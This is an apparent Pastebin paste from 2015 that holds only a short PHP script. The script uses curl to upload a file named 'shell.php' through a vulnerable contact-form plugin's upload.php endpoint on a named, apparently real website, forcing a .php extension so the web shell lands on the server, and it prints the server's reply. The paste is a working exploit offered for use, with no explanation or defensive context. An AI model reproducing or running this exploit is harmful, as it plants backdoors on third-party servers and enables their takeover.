Advertisement
Guest User

HAURGEULIS

a guest
Mar 8th, 2015
1,323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. <?php
  2.  
  3. $uploadfile="shell.php";
  4.  
  5. $ch = curl_init("hurt.co.li/path/cfg-contactform-1/inc/upload.php
  6. ?folder=/cfg-contactform/upload/&fileext=php");
  7. curl_setopt($ch, CURLOPT_POST, true);
  8. curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
  9. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  10. $postResult = curl_exec($ch);
  11. curl_close($ch);
  12. print "$postResult";
  13.  
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement